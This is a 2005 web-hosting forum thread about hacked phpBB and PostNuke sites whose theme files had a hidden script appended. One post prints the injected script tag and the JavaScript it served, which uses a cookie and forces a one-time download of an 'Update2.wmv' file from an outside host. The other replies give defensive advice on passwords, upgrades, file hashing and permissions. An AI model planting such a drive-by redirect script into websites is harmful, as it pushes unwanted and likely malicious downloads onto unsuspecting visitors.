PowWeb Forums - The Perfect Community for the Perfect Host  

Register now to interact with over 11,000 members! Registered users have Posting Privileges, free access to Private Messaging, Email Notifications and more.

Go Back   PowWeb Community Forums > Web Site Design > HTML/CSS/Javascript
User Name
Password
Register FAQ Members List Search Today's Posts Mark Forums Read

Closed Thread
 
Thread Tools
Old 11-23-05, 08:02 PM   #1
ComandoSupremo
 
Join Date: Nov 2001
Location: Virginia Beach, VA
Posts: 78
Reputation: 5
Hello,

I have had a few repor5ts from forum members at www.comandosupremo.com/forum of a media file named update2.wmv popping up on the forum for download. The media file would also show a picture of elephant. I have never put this file in the forum and I believe it may be some type of virus or trojan.

I have also noticed my tropic_anywhere.php no longer works on www.comandosupremo.com. This seemed to quit working around teh same time the forum experienced trouble.

Here is the code for the javascript:
<script language="JavaScript" type="text/javascript" src="http://www.comandosupremo.com/forum/topics_anywhere.php?mode=show&f=a&n=5&r=y&b=squ&lp b=0&lpd=0&lpi=y"></script

Any help would be most appreciated!

Jim
ComandoSupremo is offline  
Old 11-23-05, 08:55 PM   #2
Mirzabah
mod_rewrite
 
Mirzabah's Avatar
 
Join Date: Apr 2002
Location: Melbourne, Australia
Posts: 2,038
Reputation: 166
I can confirm that when I visited your site, it tried to download a file called update2.wmv - without me asking for it. This only happened the first time - subsequent re-loads didn't do anything out of the ordinarey . If you haven't already done so, I would strongly recommend changing your FTP and MySQL passwords and upgrading to the latest version of phpBB.
Mirzabah is offline  
Old 11-24-05, 06:05 PM   #3
satis
 
satis's Avatar
 
Join Date: Oct 2002
Location: Dallas
Posts: 2,914
Reputation: 311
I got it too. at the top of the main forum page is this line

PHP Code:
<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script> 
I pulled up that page, which shows the following
PHP Code:
<!--
    var 
currentDate = new Date();
    var 
adRecurrence "daily";
    var 
adId "a1087804322";
    var 
adExpiration 0;
    var 
retry=2;
    var 
flag 0;
    var 
obj=null;
        
currentDate.setTime(currentDate.getTime() + (1*36*60*60*1000));
        
adExpiration currentDate.toGMTString();
    function 
SetCookie(sNamesValuesExpire){
        var 
expireCode "";
        if (
sExpire) { expireCode =  "expires=" sExpire ";" }
        
document.cookie sName "=" escape(sValue) + ";" expireCode
    
}


    function 
GetCookie(sName) {
        var 
aCookie document.cookie.split("; ");
        for (var 
i=0aCookie.lengthi++) {
            var 
aCrumb aCookie[i].split("=");
            if (
sName == aCrumb[0]) { return unescape(aCrumb[1]); }
        }
        return 
null;
    }

    function 
upop() {
          
setTimeout("location.href = 'http://www.dlfree.com/Update2.wmv'",1000);
    }


    if (!
GetCookie(adId)) {
        
SetCookie(adId,"1"adExpiration);
                                
setTimeout("upop()",10*1000);

    }
//--> 
obviously that's the source of the popup. The question is, is this something you added to your forum? If so...just un-add it and you'll probably be fine. If not, then at least one of your forum files has been edited, which is typically a BAD sign. If someone was able to alter one of your files, there's no telling what else they might have done. At a minimum, check your user list and make sure there aren't any new admins you don't know about, and change your password.
__________________
Satis Clankiller
Clankiller.com Forums
Clankiller.com
PlasmaSky.com
satis is offline  
Old 11-25-05, 06:04 PM   #4
dvoges
Guest
 
Posts: n/a
update2.wmf site hijack

I have likewise been hijacked at http://stringersystems.com This is a PostNuke site using Xanthia themes.

I found that all the files in the active theme folder had been touched on 23Nov05 and the script appended.
 
Old 11-25-05, 07:08 PM   #5
satis
 
satis's Avatar
 
Join Date: Oct 2002
Location: Dallas
Posts: 2,914
Reputation: 311
ah, the files were appended? If that's the case, I'd consider your forum, site, and database compromised. I would highly recommend you audit your user tables, as well as upgrade to the latest release of your forum and/or postnuke versions. Not a happy occurence, I'm sure, but I've been through a similar procedure and it's not horribly complex. Much better than not knowing if someone else owns your website now. Be sure to change all your login information for anything that matters.
__________________
Satis Clankiller
Clankiller.com Forums
Clankiller.com
PlasmaSky.com
satis is offline  
Old 11-26-05, 04:27 AM   #6
linnetwoods
 
linnetwoods's Avatar
 
Join Date: Apr 2003
Location: Everywhere! Currently Mallorca, Balearic Islands
Posts: 1,460
Reputation: 86
Is there some sort of script that one can use to check for changes just before making any oneself, to see if someone else has done so? i.e. After you finished making changes on your site, you would run the script to update it, so it knew what should be there. It would tell you what changes it had found and you would OK them. Then, before making the next set of changes, you woud run the script again, to see whether it reported any changes that had been made (by someone else, obviously) since your last session. At that point you would need the option to see the changes and maybe even get some info on how hey got there and the option to undo all changes made since the last official update... Does it exist? Could it be created by someone who understands these mysteries that escape us ordinary web-manglers?
__________________
The pen is mightier than the sword. Except when the other guy has the sword
LinnetWoods.com
Your Website
US Shopping Mall
Innit Though? (my blog)
linnetwoods is offline  
Old 11-26-05, 05:24 AM   #7
IanS
Former Spam Filter (EU)
 
IanS's Avatar
 
Join Date: Mar 2004
Location: Washington (THE original UK one!)
Posts: 12,897
Reputation: 470
A bit like the md5 system (now defunct) for passing ISO images. The problem I see with this is that although the scripts won't change, with blogs and other dynamic data around the hash totals would also change unless you could specify the files to include (or exclude).
__________________
This is a Powweb customer
helping Powweb customer forum.

I am a customer just like you!!

Some matters can only be answered by staff or support.
Give it a go - ask here first!
IanS is offline  
Old 11-26-05, 11:31 PM   #8
satis
 
satis's Avatar
 
Join Date: Oct 2002
Location: Dallas
Posts: 2,914
Reputation: 311
you could do it with md5. MD5 still works, it's just 'hackable'. For something like a checksum hash I'm sure it'd still be useful.

You could probably set up a php page with cron job...have it fopen all the files, stuff all the contents into an md5, then store the hash somewhere (like a db table or a flat file). Actually, a db table would be great...one row per day per file or something. Then have it compare the previous day's hashes with the current days and raise a warning if they're difference.

As long as you're doing it on the static background php pages (and not cached templates or anything truly dynamic) that'd be a great way to do it. Good idea IanS. Now to trick Extras or someone into coding it. hehe.
__________________
Satis Clankiller
Clankiller.com Forums
Clankiller.com
PlasmaSky.com
satis is offline  
Old 11-27-05, 07:31 AM   #9
extras
on hiatus
 
Join Date: Mar 2004
Location: Canada
Posts: 5,815
Reputation: 314
Quote:
Originally Posted by satis
Now to trick Extras or someone into coding it. hehe.
I will not write something like that.
It's not effective.

I mean, it only tries to detect already cracked situation, and it's too late.
Also, it's going to be extremely heavy, some people will abuse it and harm everyone.

It's better to detect, bad permission setting (666, 777, ...),
unsafe scripts, and other vulnerabilities BEFORE being cracked.

But I don't think I will write that either, as it's going to be a heavy script
(although not as heavy as checking md5 or CRC), and people who needs them
will abuse the script, most probably.


The real problem is, let's say, the lack of education.
Constructing safe site is easy.

The ten commandments for safer web site (for PowWeb users)
Quote:
1. Use safer permission setting of 710 instead of 755 for all directories.
2. Use even safer permission of 700 for directories not directly accessed by Apache.
3. Use 750 only for directories you want to use Apache's default directory listing.

4. Use safer permission of 600 instead of 640 for ALL PHP scripts.
5. Use safer permission of 700 instead of 755 for ALL CGI scripts.

6. Password protect ALL scripts other than you want general public to access,
including webstats provided by PowWeb.

7. Avoid using unsafe scripts: Matt's Formmail.pl, phpBB2, php-Nuke,
and many other PHP and CGI scripts. I guess 90% of cracking happens this way.

Remember that PHP is a vulnerable, buggy, and risky languages
and scripts written with it are often very vulnerable, buggy and risky.

Static contents require much less maintenance and a lot safer,
and can be as cool as stupid CMS/BLOG construction.

8. Check the IP of last access for OPS, FTP, and mail, regularly.
9. Check your raw log to see suspicious access and cracking attempts.

10. Keep your PC safe. If your PC is compromised, bad people can obtain
access to your site and many many personal information.

DO NOT trust BIG corporation, like MS, SONY, and so on.
These guys often create stupid products, but they can be clever in deceiving naive users.

Stay away from hyped, fancy, needless, or heavy features.
Stay away from IE/OE, html mail, Javascript, and so on.
Now, I think what we need is something to replace PHP and its badly written apps.
PHP is a cancer of shared hosting in terms of security and resource usage.
(On dedicated server or VPS, it's not as bad.)

Some PHP users are dreaming that Ruby on Rails will be the savior, but I don't think so.
It's still too heavy and apps will be written by same PHP coders who have been
writing unsafe inefficient scripts that the end result will be similar.

I've experimented OCaml and found it pretty fast and small.
And I will write replacement Form mailer and simple CMS with it, probably.


The main problem is the ignorance, again.
People are not aware of how much they are suffering from bad hype around PHP,
just like they are suffering from unsafe MS products such as IE/OE.

And I don't foresee any change in this area very soon, unfortunately.
I've been telling this many times in this forum.
Yet most people are still using unsafe permission and vulnerable scripts without protection.
It's nearly "normal" and inevitable to get cracked.
extras is offline  
Old 11-27-05, 01:24 PM   #10
linnetwoods
 
linnetwoods's Avatar
 
Join Date: Apr 2003
Location: Everywhere! Currently Mallorca, Balearic Islands
Posts: 1,460
Reputation: 86
I know nothing about anything but I came to the conclusion (borne out by a quick glance at the proportion of threads with problems on php on this very forum!) that I should forget trying to use php or MySQL and stick with the simplicity of html, when building some shops for a client. He is really pleased with the results, everything works and the shops are unique instead of being very much like a zillion others. We used PayPal as they have now decided that people can pay by credit card without having to join.

I can see that for a forum or chat room there is probably no alternative but shops and galleries can be made in html without too much slog and they aren't bug-ridden.
__________________
The pen is mightier than the sword. Except when the other guy has the sword
LinnetWoods.com
Your Website
US Shopping Mall
Innit Though? (my blog)
linnetwoods is offline  
Old 11-27-05, 03:32 PM   #11
extras
on hiatus
 
Join Date: Mar 2004
Location: Canada
Posts: 5,815
Reputation: 314
I wrote a small script that checks unsafe permission, and correct them.

To use, install extratools.php (automatic installer)
http://check-these.info/tools/extratools_php.txt

Then, click on "Install/Update 666.cgi".
When installation is finished, click on the link "666.cgi" or "Run 666.cgi".

This will prevent at least simple cracking done via directory with unsafe permission,
like some people in this thread have suffered.

Note:
If you have a site with lots of files, it may timeout.
It's a slow script, and it won't cause resource abuse, AFAIK.
extras is offline  
Closed Thread

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 04:12 AM.


Contents ©PowWeb, Inc. ~ vBulletin, Copyright 2000-2007 Jelsoft Enterprises Limited.